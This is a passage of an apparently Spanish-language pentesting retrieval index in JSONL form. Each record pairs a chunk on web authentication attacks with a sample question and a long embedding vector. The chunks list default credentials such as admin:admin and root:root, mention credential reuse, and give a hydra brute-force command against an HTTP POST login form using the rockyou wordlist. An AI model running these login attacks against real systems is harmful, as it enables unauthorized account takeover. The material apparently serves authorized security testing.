0.01561, 0.03771, -0.0673, -0.00589, -0.08729, -0.1091, -0.04346, 0.13418, 0.06012, 0.03029, -0.07315, -0.02546, -0.01971, 0.00962, 0.00908, -0.11623, 0.00817, -0.09812, -0.04166, -0.00485, -0.04952, -0.05002, 0.00542, 0.00804, -0.0607, -0.05364, -0.06946, 0.00448, -0.01792, -0.03363, -0.1018, 0.05024, 0.04695, -0.0278, 0.04531, 0.02161, -0.02926, -0.00552, -0.11144, 0.11079, 0.02277, -0.00613, -0.02059, 0.01359, 0.02179, 0.10337, -0.05212, -0.01618, 0.0214, 0.01694, -0.06009, -0.03497, -0.10756, 0.03263, -0.01792, 0.10603, -0.02837, 0.03895, -0.00509, -0.03275, 0.03496, -0.0599, -0.01465, 0.00777, -0.00678, 0.08541, -0.00867, 0.01105, 0.05915, -0.02683, 0.02819, 0.00942, 0.07708, -0.04781, -0.02656, 0.00462, 0.04479, 0.01918, 0.03744, -0.03869, 0.00154, -0.0174, 0.02452, -0.06118, 0.00984, -0.01944, 0.0135, -0.0405, -0.04899, -0.00207, 0.05001, 0.01364, 0.06085, 0.04901, 0.01743, 0.0031, 0.01357, 0.00363, 0.02415, -0.00954, 0.05982, -0.02549, 0.03336, 0.01146, -0.02879, 0.01477, -0.02187, -0.02353, 0.0751, 0.02951, -0.02723, 0.01398, 0.00958, 0.02728, 0.07289, -0.02189, 0.07573, 0.0212, -0.01396, -0.01006, 0.00105, 0.0478, 0.01864, 0.05524, -0.02718, 0.02791, 0.01915, 0.04115, 0.02375, -0.02659, -0.0044, -0.04099, 0.04895, 0.01911, 0.04414, 0.02205, -0.04499, -0.03234, 0.04712, -0.01859, 0.00821, -0.07618, -0.03298, -0.03621, 0.02694, 0.07351, 0.00204, -0.06927, -0.00902, -0.04961, -0.00898, 0.01691, 0.02859, -0.07193, -0.02972, 0.08506, 0.03079, -0.04157, 0.00355, -0.08473]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "que herramienta sirve para romper logins con fuerza bruta", "v": [0.04551, -0.0356, -0.29896, -0.15513, -0.0264, -0.01803, -0.01347, 0.0425, 0.02868, -0.15189, -0.10747, 0.01181, 0.10401, 0.06729, 0.02862, -0.09775, -0.07815, -0.1299, -0.14245, -0.00718, -0.03552, -0.04861, 0.04507, -0.12397, -0.04888, -0.06626, 0.00607, 0.07203, -0.16535, -0.01406, -0.01984, 0.0403, 0.1454, -0.07459, -0.04839, -0.04177, -0.06453, 0.03584, 0.07356, 0.11018, 0.01161, 0.10212, -0.057, 0.05995, -0.05003, 0.03866, -0.05879, 0.0623, 0.00424, 0.1397, -0.07792, -0.10829, -0.086, -0.01155, -0.09886, -0.19544, 0.10162, -0.07554, -0.11117, 0.02016, -0.16463, 0.05179, -0.08706, -0.09207, -0.00986, -0.00243, -0.05874, -0.10693, -0.01593, 0.03314, -0.1621, -0.02273, -0.04302, -0.05379, -0.07076, 0.0199, 0.00154, 0.03584, 0.01469, -0.00516, 0.03594, 0.03479, -0.15489, 0.00278, -0.0648, -0.07398, 0.11521, -0.00846, 0.02836, -0.0372, 0.00702, 0.04395, -0.01653, -0.01269, 0.03067, 0.01055, 0.00675, -0.01755, -0.0302, -0.03553, 0.07683, -0.09123, -0.0616, -0.06869, 0.04053, -0.08894, -0.06117, 0.01364, -0.04651, 0.06583, 0.08895, -0.0152, -0.03387, 0.06082, -0.04049, 0.08343, -0.12482, -0.11532, -0.07119, -0.00568, 0.00145, 0.02729, -0.06858, 0.04533, -0.06209, 0.04594, 0.03667, 0.07157, 0.01215, -0.109, 0.03358, -0.03416, 0.0078, 0.01833, 0.00649, -0.07192, 0.06023, -0.13929, -0.02493, -0.1051, 0.00463, 0.02784, 0.00312, -0.07383, 0.06513, 0.05991, 0.05065, 0.01135, -0.0161, 0.00864, 0.07052, -0.07945, -0.00927, 0.07085, -0.08948, 0.0024, 0.01435, -0.03495, -0.0793, -0.00546, -0.06717, -0.06703, -0.03758, -0.05228, -0.00335, -0.01403, -0.02064, -0.0176, 0.07418, 0.04532, 0.0238, -0.00959, 0.11255, 0.0487, 0.00854, -0.05434, -0.03232, 0.05089, -0.0694, -0.01218, 0.00491, -9e-05, -0.02419, -0.01382, -0.00887, -0.01815, 0.02377, -0.03735, 0.02431, 0.01342, -0.01233, 0.05396, -0.0448, -0.01114, 0.01481, -0.00369, -0.02842, 0.02077, 0.04603, -0.0003, -0.02544, -0.01372, 0.02189, -0.0276, 0.04557, 0.06243, 0.03698, -0.04608, -0.00145, -0.01185, 0.00318, 0.01055, 0.01127, -0.05318, -0.01002, -0.0286, -0.02551, 0.02198, -0.00424, 0.03574, -0.03723, 0.03143, 0.00616, -0.00702, -0.01047, 0.02461, 0.01938, -0.07882, 0.01989, 0.0324, 0.02496, -0.06018, -0.0155, 0.02794, -0.01755, -0.06177, 0.02654, 0.00944, -0.07369, -0.00805, -0.02954, 0.07591, -0.01755, -0.04492, -0.04982, 0.00464, 0.01264, -0.04231, -0.03859, -0.02691, -0.01361, 0.01682, 0.06368, -0.01495, 0.01686, -0.03162]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "con que puedo realizar ataques de credenciales por defecto", "v": [-0.08483, 0.06275, -0.23849, 0.0185, 0.09089, 0.07157, 0.13058, 0.17022, -0.05618, -0.01745, 0.02758, 0.04037, -0.16255, -0.14761, 0.08786, 0.05396, 0.03525, 0.0252, 0.12801, -0.07027, 0.02832, -0.14404, 0.02601, 0.04486, 0.03251, 0.05946, -0.05547, 0.13015, 0.01463, -0.11059, -0.05341, -0.06261, 0.01268, 0.02221, 0.0549, 0.0487, -0.10579, 0.12318, 0.08945, 0.11608, 0.01627, -0.02454, -0.1416, -0.08811, 0.12629, -0.01673, -0.02362, 0.01897, -0.07064, -0.04571, 0.05598, -0.01742, -0.20142, -0.10405, -0.06108, 0.01707, 0.04007, -0.08348, 0.07716, -0.09835, -0.10491, 0.07529, 0.08962, -0.00457, 0.04044, -0.05212, -0.09303, -0.0713, -0.09042, 0.08544, -0.04441, -0.04909, 0.01968, 0.04685, -0.02056, -0.0385, 0.04497, 0.02721, 0.03104, -0.0086, -0.00742, 0.02317, -0.0578, -0.01044, -0.08492, -0.00454, -0.02365, -0.02178, -0.07002, -0.02818, 0.05742, 0.02622, -0.00506, -0.05847, -0.10364, 0.02671, -0.05007, -0.05281, -0.03342, -0.06544, -0.02887, -0.04048, -0.01186, 0.13813, -0.00837, 0.05757, -0.0034, 0.05104, 0.02352, -0.14366, -0.05073, -0.02135, -0.02363, -0.07602, 0.02251, -0.00627, -0.11565, -0.0136, 0.08615, 0.01812, -0.07293, -0.08498, 0.00052, 0.03109, 0.00793, 0.03967, -0.04933, 0.01281, -0.07553, -0.05405, -0.02475, 0.01716, 0.0687, -0.02059, 0.00299, 0.03425, 0.00062, -0.12586, -0.00257, 0.03161, 0.06543, 0.05819, 0.02315, 0.01167, 0.01755, 0.05607, -0.08206, -0.09147, -0.06131, -0.09324, 0.05929, 0.11035, 0.03546, 0.05317, -0.10246, -0.01085, 0.04401, -0.02871, 0.01636, 0.10078, -0.03164, 0.04665, -0.02073, 0.07815, -0.07046, -0.05272, -0.00411, -0.00111, 0.06747, 0.03807, -0.03642, 0.07451, -0.01272, -0.07032, 0.00912, -0.00827, -0.06108, -0.06576, -0.00678, -0.04753, -0.00461, -0.07772, -0.0654, 0.02499, 0.01745, 0.01825, 0.03117, 0.02321, 0.04229, 0.00687, 0.01516, -0.04898, 0.05433, 0.06566, 0.05118, 0.00106, -0.00469, -0.00935, -0.03668, -0.00957, -0.01435, -0.02263, -0.05438, -0.04831, 0.06107, 0.05534, -0.00799, 0.00207, 0.001, 0.05772, 0.06345, -0.05403, 0.09395, -0.0998, -0.08612, 0.03155, 0.04776, 0.01467, -0.03868, -0.0371, 0.04652, -0.03178, 0.02363, 0.04543, -0.00984, -0.05365, -0.03867, -0.08604, 0.0484, 0.06527, 0.0194, -0.02748, -0.02918, -0.09063, 0.03216, -0.01928, 0.02923, 0.02145, -0.0365, 0.01655, -0.05912, -0.00474, 0.02963, -0.06039, -0.00169, -0.03039, -0.09655, -0.00362, 0.01748, -0.02953, -0.02621, 0.0444, 0.04099, -0.01348, 0.03024, -0.00194]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "cual es una alternativa libre a los ataques de bypass de login", "v": [-0.03515, 0.09893, -0.17061, -0.04773, -0.09912, -0.0247, -0.03426, 0.00372, -0.12923, 0.06927, 0.0005, -0.18858, -0.07094, 0.10909, 0.0827, -0.10352, 0.03323, -0.01756, 0.1416, -0.07304, -0.08318, 0.04948, -0.01529, 0.0327, 0.01389, -0.01966, -0.01398, 0.04795, -0.11001, -0.0753, -0.02946, -0.05412, 0.06853, 0.01937, 0.02779, 0.01944, 0.111, 0.15907, 0.17064, 0.04347, 0.00208, -0.1197, -0.13162, 0.03603, 0.06797, -0.11826, -0.00387, 0.10332, 0.05526, 0.00962, 0.00761, 0.026, -0.1303, 0.01422, 0.05263, -0.04747, 0.05748, -0.13591, -0.02891, 0.00339, -0.19664, 0.10294, 0.05297, -0.05076, 0.06964, -0.093, -0.0675, -0.02335, -0.10513, 0.15479, 0.0559, -0.04796, -0.02668, 0.01838, -0.07992, -0.00246, -0.02774, 0.06149, 0.061, 0.05081, 0.07322, -0.08119, -0.05344, 0.00961, -0.13567, -0.02269, 0.04966, -0.03759, -0.02653, 0.06095, 0.10359, -7e-05, 0.01471, 0.05056, -0.04255, -0.01368, -0.01573, -0.00979, -0.04089, -0.05489, 0.04076, 0.02674, -0.13402, 0.08782, 0.0325, -0.02992, -0.04089, 0.02348, -0.03244, -0.0677, -0.05984, 0.00057, 0.00046, -0.04748, 0.08027, -0.03164, -0.0639, 0.0127, 0.03301, 0.04747, -0.10824, -0.01841, -0.06441, -0.03702, 0.02356, 0.06754, 0.06508, 0.01124, -0.08331, 0.01695, 0.03462, 0.02838, -0.00111, -0.04602, -0.10757, -0.01978, 0.06218, -0.1291, -0.00311, 0.03907, 0.03749, 0.1013, 0.03687, 0.01686, 0.04887, 0.02918, -0.01391, -0.02752, -0.07139, -0.06, -0.05031, -0.00523, 0.01158, 0.13032, -0.07088, 0.00605, -0.05057, -0.01957, -0.02254, 0.16568, 0.00304, 0.03062, -0.06904, 0.01471, -0.06732, -0.0305, 0.01128, -0.05042, -0.00022, 0.028, 0.0211, 0.09517, 0.09771, -0.07793, 0.04428, -0.06838, -0.00295, -0.12422, 0.0484, -0.02638, 0.02163, -0.02737, -0.09587, -0.02174, -0.00376, -0.04175, 0.06382, 0.04732, 0.07095, 0.0804, -0.03494, 0.03519, -0.03487, 0.00097, -0.01513, -0.01938, -0.04185, -0.05829, -0.02218, -0.02188, 0.0202, -0.02078, -0.04494, -0.0672, 0.01058, 0.03558, -0.01082, -0.02341, -0.01465, 0.05007, 0.09808, -0.01937, 0.07641, -0.02332, -0.05298, 0.01561, 0.06745, -0.0079, -0.02195, -0.03158, 0.0778, 0.00643, 0.0224, 0.03698, -0.02218, 0.02014, -0.05369, -0.02835, -0.00406, 0.01521, 0.01239, -0.03623, -0.02326, 0.04022, 0.0223, -0.02673, 0.00556, 0.02616, -0.05311, 0.02101, 0.04487, 0.05068, -0.0154, -0.03064, -0.06408, -0.00647, -0.09393, -0.03234, -0.03923, -0.05122, -0.00435, 0.04797, -0.03404, 0.04578, 0.06246, 0.01657]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (bΓΊscalas: `searchsploit ` o Google).\n- **ReutilizaciΓ³n**: cualquier credencial que pillaste antes (MetodologΓ­a OSCP).", "indexar": "quΓ© herramienta sirve para buscar credenciales por defecto de productos", "v": [-0.08578, -0.02958, -0.21305, -0.11358, 0.1338, -0.10749, -0.01282, 0.01518, -0.06454, -0.18798, -0.09128, 0.00023, -0.1308, -0.19744, 0.07856, 0.03351, 0.06489, -0.12546, 0.07068, -0.00458, 0.0124, -0.08548, -0.14413, -0.09571, -0.15283, -0.00075, 0.03718, -0.03602, -0.15199, 0.13749, -0.02564, -0.0457, 0.02825, -0.04447, -0.15593, 0.00134, -0.06327, -0.03109, -0.05113, 0.13248, 0.04074, 0.0162, 0.01502, -0.03269, 0.00253, 0.00482, -0.01134, 0.04882, -0.12102, 0.11769, 0.0019, -0.17298, -0.14438, 0.00593, 0.03318, -0.03901, 0.11375, -0.06766, 0.08659, -0.15087, -0.16607, -0.03988, 0.054, -0.037, -0.03734, -0.04892, -0.08255, -0.12633, -0.06278, 0.03416, -0.11191, -0.07803, 0.05707, -0.0643, -0.02778, -0.03247, 0.04381, 0.10162, 0.08329, -0.03329, 0.08423, 0.02394, -0.0466, -0.01332, 0.01101, -0.07376, 0.10822, 0.08275, -0.00991, -0.06383, -0.00702, 0.10647, -0.00471, -0.00076, -0.03083, 0.01666, 0.05936, -0.07127, -0.00185, 0.02831, 0.05573, -0.08141, -0.03291, 0.0699, -0.04495, 0.00146, -0.02325, 0.0556, -0.13409, 0.0138, 0.04939, -0.01142, 0.01, -0.02111, 0.04151, 0.10392, -0.05221, -0.08869, -0.00513, 0.01996, 0.06602, 0.04212, -0.0486, -0.05186, 0.04248, 0.03619, -0.00687, 0.05125, 0.00339, -0.06181, 0.04322, -0.06262, -0.02806, -0.00215, 0.06039, -0.09324, 0.0691, -0.1147, -0.00918, -0.01323, 0.07715, -0.02771, -0.04709, -0.06867, 0.01638, 0.03767, 0.02397, 0.0024, 0.01712, -0.03612, 0.03553, 0.00965, 0.01147, -0.02325, -0.03632, 0.00153, -0.01978, -0.00612, -0.0629, 0.03096, -0.08728, -0.03122, 0.04854, 0.05234, 0.00258, -0.08068, 0.03014, 0.00714, 0.06152, 0.02888, 0.01181, 0.0325, 0.01005, -0.0898, -0.03773, -0.01795, -0.05889, 0.00011, -0.00079, -0.09075, -0.00473, -0.01449, -0.00534, 0.02579, 0.05643, -0.03096, -0.00305, -0.03934, 0.01119, 0.01541, -0.01922, -0.03376, 0.04383, -0.08183, 0.03447, 0.04167, 0.04618, -0.0499, 0.03924, -0.04702, -0.05058, -0.01867, -0.0144, -0.049, 0.05209, 0.01637, -0.01063, -0.0109, 0.00935, 0.05324, 0.01812, -0.03306, 0.02674, -0.01064, -0.05406, -0.00745, -0.01099, 0.03632, -0.0181, 0.0306, 0.02338, -0.04853, -0.00677, 0.07098, -0.02946, 0.01857, -0.01533, -0.0273, -0.00094, -0.01482, 0.03989, -0.05282, -0.04827, -0.0443, 0.02118, -0.09073, 0.04385, 0.02889, -0.00031, -0.01534, -0.01861, 0.03879, 0.00605, -0.03534, -0.04442, -0.00199, 0.01582, -0.02245, -0.0242, -0.04406, -0.08624, -0.02555, 0.02965, -0.02843, 0.04334, -0.01659]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (bΓΊscalas: `searchsploit ` o Google).\n- **ReutilizaciΓ³n**: cualquier credencial que pillaste antes (MetodologΓ­a OSCP).", "indexar": "cΓ³mo puedo encontrar contraseΓ±as comunes de sistemas y CMS", "v": [0.11713, 0.07512, 0.03051, -0.15107, -0.08607, -0.2109, -0.04584, -0.01469, -0.20725, -0.03636, -0.12758, 0.06636, -0.04545, -0.08406, 0.11661, 0.0238, 0.18742, -0.03863, 0.01976, 0.00766, -0.02102, -0.25277, -0.06944, 0.06082, -0.08732, 0.01784, 0.02664, -0.13227, -0.0687, -0.07673, 0.06098, -0.0369, 0.05352, 0.10207, -0.09131, 0.02527, -0.10189, 0.08496, -0.03953, -0.00405, 0.10331, 0.0281, -0.06507, 0.02227, 0.01187, -0.11358, 0.02331, -0.0822, 0.07085, -0.16157, -0.2122, -0.03741, -0.16818, -0.1051, -0.00999, -0.05471, 0.08702, 0.02726, -0.02106, 0.00023, -0.08352, 0.05921, -0.00075, 0.03774, -0.113, -0.06428, -0.0119, 0.0328, -0.07948, 0.12112, 0.03481, -0.01295, -0.03861, -0.00247, 0.06594, 0.02094, 0.02336, 0.02743, 0.03523, 0.00161, -0.04024, -0.07887, 0.0179, 0.04536, -0.08111, -0.01486, 0.02194, -0.06115, -0.01673, -0.02959, 0.12671, -0.0073, 0.03232, 0.04578, -0.00211, -0.0696, -0.05036, 0.02049, -0.04647, -0.01041, -0.07355, 0.0405, 0.0073, 0.12605, -0.09584, -0.02684, 0.08589, 0.03097, 0.0338, -0.11369, 0.02768, -0.00787, -0.04847, -0.03742, -0.04134, 0.02043, 0.0285, 0.01464, 0.01218, -0.01308, -0.03807, -0.04087, -0.01302, -0.01491, 0.08769, 0.05311, 0.04268, 0.01692, -0.06592, -0.05795, -0.00823, -0.03965, -0.0605, 0.0522, 0.01968, 0.10091, 0.02146, -0.03179, -0.05196, -0.03541, -0.07676, -0.02085, 0.04595, -0.06632, 0.06911, 0.05922, 0.05487, -0.09806, -0.05826, -0.02801, -0.00265, 0.05108, 0.00149, -0.04031, -0.04838, 0.03773, 0.02947, -0.09406, -0.06631, 0.07176, -0.03282, -0.00629, -0.03717, -0.01068, -0.04729, -0.02419, -0.02165, -0.00282, 0.0755, 0.02587, 0.06112, 0.08186, 0.06871, -0.09228, 0.02676, -0.01924, -0.02568, -0.11476, 0.02366, -0.03522, -0.06042, 0.01074, -0.01001, -0.00597, 0.03028, -0.04154, 0.04659, 0.03477, -8e-05, -0.01404, 0.03959, 0.00322, -0.03155, 0.01242, 0.03139, 0.00174, -0.00937, -0.07555, -0.06246, -0.03028, -0.04439, 0.04157, 0.04041, -0.09794, 0.02112, 0.02203, 0.00397, -0.00505, -0.00563, 0.02331, 0.0273, 0.02465, 0.00424, -0.05921, -0.07057, -0.05929, -0.05817, 0.03746, -0.02302, -0.0608, 0.00633, 0.01393, 0.06109, 0.03754, 0.06808, -0.07862, 0.00967, 0.02653, 0.02158, 0.03619, -0.01416, -0.01251, 0.00715, 0.00788, 0.08259, -0.00046, -0.05302, -0.02743, -0.02873, -0.00299, 0.02174, 0.04699, 0.05504, -0.01711, -0.01258, -0.04903, -0.08291, -0.0138, -0.01106, -0.0264, -0.03542, -0.02892, 0.02169, -0.00453, -0.01099, -0.03246]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "quΓ© herramienta sirve para probar contraseΓ±as en formularios POST?", "v": [0.11984, 0.04811, -0.14345, -0.2425, 0.07064, -0.19272, 0.04976, -0.17299, -0.04119, -0.11193, -0.00759, 0.00547, 0.04086, -0.10266, 0.04921, 0.0228, 0.13826, -0.07016, 0.04197, 0.08103, -0.00755, -0.0068, -0.18896, -0.07799, -0.08149, -0.0663, 0.07865, -0.10727, -0.12475, 0.02358, 0.07945, -0.01379, 0.06072, -0.00819, -0.07443, 0.06589, -0.02599, 0.04644, -0.05023, 0.05453, 0.10505, 0.07481, -0.07736, 0.05807, -0.07817, 0.02026, -0.07098, 0.0244, 0.00431, 0.03182, -0.02516, -0.1619, -0.10335, -0.02018, -0.04147, -0.08229, 0.20658, -0.14006, 0.02799, -0.01081, -0.10083, -0.00983, 0.03744, 0.094, -0.03845, -0.09483, 0.08288, -0.03048, -0.14851, 0.0779, 0.01788, -0.01527, -0.03079, -0.03422, -0.05821, -0.01789, 0.02638, -0.0026, 0.03075, 0.09783, -0.01814, -0.02554, -0.07728, 0.00601, -0.06372, -0.02844, 0.03859, -0.00089, -0.03163, -0.11093, 0.08163, -0.00613, -0.0408, 0.00387, 0.00777, -0.046, 0.01411, -0.01605, 0.01115, -0.035, 0.0269, 0.00291, -0.0469, 0.11082, -0.1064, -0.03523, -0.04165, 0.00484, -0.01561, -0.10662, 0.05711, -0.01988, -0.08402, 0.01158, 0.01812, 0.07301, -0.02768, -0.07507, -0.00224, -0.0803, 0.009, 0.06582, -0.08042, 0.00481, 0.06117, 0.04143, -0.00286, 0.0228, -0.01994, -0.0485, 0.00664, -0.04768, -0.07, 0.09285, 0.04934, 0.04567, 0.04192, -0.12086, -0.06269, -0.06557, 0.02932, 0.04544, 0.00696, -0.12325, 0.01117, 0.04462, 0.0393, -0.00829, -0.10175, -0.02418, 0.01902, -0.06391, 0.00496, 0.05951, -0.07176, -0.02821, -0.02231, -0.08076, -0.0978, 0.11843, -0.05166, -0.03773, -0.0215, 0.07125, -0.02769, -0.02814, -0.01084, 0.01701, 0.05568, 0.03995, 0.06711, 0.05902, 0.04704, -0.07926, 0.04174, 0.01061, -0.05372, 0.00433, 0.00585, -0.08951, -0.02539, -0.00169, -0.03884, -0.01039, 0.02147, -0.0417, 0.06567, -0.04239, 0.02274, -0.00925, -0.01014, 0.02684, -0.03371, -0.00695, -0.00086, 0.00965, -0.00834, -0.0869, 0.03951, -0.04776, -0.00316, -0.03762, -0.06384, -0.05395, 0.02815, 0.06262, -0.07549, -0.0305, 0.0094, 0.01154, 0.03101, -0.02085, 0.0405, -0.04075, -0.0558, -0.03599, 0.01201, 0.04247, -0.02901, 0.00138, 0.04149, 0.0208, 0.0336, 0.01207, 0.01025, 0.07101, 0.03879, 0.02441, 0.01604, -0.01494, 0.03501, 0.03507, -0.05548, -0.01314, 0.07371, -0.00574, 0.00497, -0.07566, -0.0716, -0.07021, -0.00986, 0.04111, -0.00167, -0.054, -0.04803, -0.05089, -0.03191, -0.00354, -0.0084, -0.01957, -0.08068, 0.03491, 0.04891, -0.00256, 0.00275, -0.07766]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "con quΓ© puedo realizar un ataque de fuerza bruta a una pΓ‘gina de inicio de sesiΓ³n?", "v": [-0.06583, 0.12891, -0.20396, -0.07401, -0.0563, 0.02242, -0.00136, -0.02171, -0.01169, -0.06947, -0.11627, -0.01187, -0.07263, 0.07916, 0.03216, -0.04512, 0.01144, -0.00467, -0.04848, -0.14233, 0.01525, -0.07202, 0.09667, -0.02957, -0.05018, -0.03178, 0.02323, 0.15986, -0.03857, -0.12737, -0.03022, 0.00375, 0.14865, -0.04585, 0.09311, -0.06684, -0.02293, 0.12221, 0.16407, 0.08887, -0.1033, 0.06541, -0.1591, -0.00695, 0.07597, 0.03707, 0.00303, 0.04483, -0.04185, 0.00804, 0.0226, 0.00477, -0.10337, -0.05412, -0.18087, -0.04746, 0.09359, -0.11656, -0.035, -0.00596, -0.05375, 0.11537, -0.07133, -0.08359, 0.01339, -0.02536, -0.02773, -0.00907, 0.06901, 0.0616, -0.13355, -0.09443, -0.06877, -0.04301, 0.01496, -0.05161, 0.01061, 0.05401, -0.03341, 0.00297, -0.04582, 0.04242, -0.14011, -0.0196, -0.17919, -0.01123, 0.01211, 0.01013, -0.05134, -0.08546, 0.04034, -0.02773, -0.00055, -0.06987, -0.11608, 0.01331, -0.08788, 0.03212, -0.0218, -0.08503, -0.03487, -0.03999, -0.02221, 0.00452, 0.14649, -0.05429, -0.10263, -0.00556, -0.008, -0.00093, 0.00906, -0.05394, -0.11315, -0.03875, -0.01427, 0.01246, -0.1729, -0.01869, -0.03265, 0.01641, -0.11111, -0.01049, -0.02549, 0.02685, -0.07171, 0.0285, 0.06723, 0.00719, -0.0425, -0.04402, 0.01683, 0.02021, 0.0664, -0.01953, 0.05049, 0.01919, 0.04323, -0.09651, -0.07216, -0.07235, 0.0177, 0.05541, 0.02798, -0.05608, 0.06347, -0.00551, -0.01168, -0.0205, -0.13257, 0.05749, 0.06399, -0.02187, 0.07708, 0.08908, -0.0488, -0.02658, 0.03353, -0.05744, 0.00239, 0.04062, -0.05337, 0.01988, -0.11533, -0.02511, -0.00859, -0.0151, -0.14709, -0.0344, 0.02797, 0.0273, -0.03579, -0.00135, 0.02787, -0.01884, 0.03095, -0.06114, -0.08679, 0.02453, 0.04445, 0.00459, -0.01706, -0.03808, -0.05908, 0.0102, -0.04142, -0.01103, 0.04689, -0.01867, 0.01156, -0.01559, 0.0145, 0.06064, -0.08996, 0.02676, 0.00359, -0.05137, -0.08285, 0.0361, -0.0025, 0.02216, 0.02235, -0.04883, -0.00794, -0.01147, 0.05478, 0.02415, -0.0121, -0.02809, -0.05586, 0.00119, 0.00736, -0.00555, 0.0911, -0.08646, -0.04799, 0.01037, 0.03495, -0.02175, 0.02696, -0.01118, 0.03051, 0.10118, 0.0244, 0.05196, 0.01955, -0.01963, 0.03307, -0.10657, 0.02057, 0.06881, -0.01866, -0.0581, -0.00426, -0.02401, -0.00648, -0.00512, 0.0369, 0.0357, -0.10694, 0.04072, -0.00021, 0.04636, -0.01788, -0.05924, -0.02091, -0.01555, -0.06906, -0.03889, -0.03422, -0.03462, -0.05245, 0.02679, 0.08717, -0.00228, 0.02588, -0.05326]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "existe algΓΊn programa como Hydra que permita usar mensajes personalizados de error?", "v": [-0.00576, 0.15927, -0.1367, -0.12054, -0.01236, -0.05408, -0.08052, -0.08655, -0.08849, -0.16682, -0.10933, -0.02632, 0.04312, -0.05811, -0.02645, -0.04708, 0.11148, 0.02838, 0.05367, 0.0037, 0.04909, 0.04761, -0.12303, -0.08367, -0.14198, -0.02095, -0.03355, -0.00013, -0.16839, -0.10904, 0.05931, -0.03638, 0.06677, -0.05759, -0.12407, 0.00212, -0.03088, -0.03142, 0.00236, 0.08922, 0.12632, 0.10643, 0.01838, 0.00103, 0.08222, 0.05441, -0.00054, 0.05012, 0.01524, -0.01825, -0.01811, -0.02938, -0.12855, 0.01232, 0.02867, -0.09086, 0.16358, -0.06799, -0.03107, -0.06667, -0.00088, 0.00297, 0.07448, -0.00674, -0.04329, -0.00834, 0.12178, -0.10849, -0.12944, 0.08307, 0.02595, -0.0055, 0.00977, 0.04972, 0.06695, 0.06723, -0.08593, -0.00776, 0.00462, 0.04983, -0.00147, -0.03651, -0.00681, 0.01468, -0.07958, -0.13803, 0.06653, -0.0217, 0.03028, -0.14102, 0.03674, 0.05072, -0.0207, 0.07492, -0.01404, -0.15002, 0.0618, 0.01036, 0.02782, 0.12159, 0.12938, -0.03925, 0.00662, 0.07422, -0.01978, 0.03808, 0.12944, -0.11, 0.08736, 0.05925, -0.0001, -0.06404, 0.01375, -0.05368, -0.03309, -0.05493, 0.02667, -0.08087, 0.01012, -0.04186, -0.07423, -0.01296, 0.0651, 0.0455, 0.0736, 0.0294, -0.03921, 0.06809, -0.04114, 0.1438, -0.05692, 0.00687, -0.0269, -0.03929, -0.06683, 0.02451, -0.0013, 0.05252, -0.03473, 0.00521, 0.01608, 0.10215, -0.0463, -0.00982, -0.02897, 0.05237, -0.08563, -0.11058, -0.04753, 0.03773, 0.13811, 0.0063, 0.01178, 0.06615, -0.07987, -0.05627, 0.02483, -0.03054, 0.00132, 0.02578, -0.08184, -0.02516, -0.00693, 0.03265, 0.05856, -0.04793, -0.03746, 0.04301, 0.05434, 0.07693, -0.01812, 0.08524, 0.06251, -0.10732, 0.03973, 0.00239, 0.01222, -0.03562, -0.02248, -0.04984, -0.08786, 0.02392, 0.03618, 0.00756, 0.03273, -0.04338, -0.04808, 0.02649, 0.01846, 0.04749, -0.03767, 0.03801, -0.01944, -0.03378, -0.02853, 0.02735, -0.03001, -0.01998, 0.07891, -0.05063, -0.01744, -0.00445, 0.01136, -0.0276, 0.02992, 0.05629, -0.0732, -0.03972, 0.0541, 0.07977, 0.04294, -0.1029, 0.08502, -0.01703, -0.02885, 0.02236, 0.06004, 0.04791, 0.03492, 0.02306, 0.01408, 0.00217, 0.004, -0.00522, -0.03798, 0.00898, 0.00301, 0.01247, 0.01138, 0.07622, 0.01506, 0.03672, -0.08497, -0.03707, 0.06764, 0.00326, 0.02461, -0.04803, 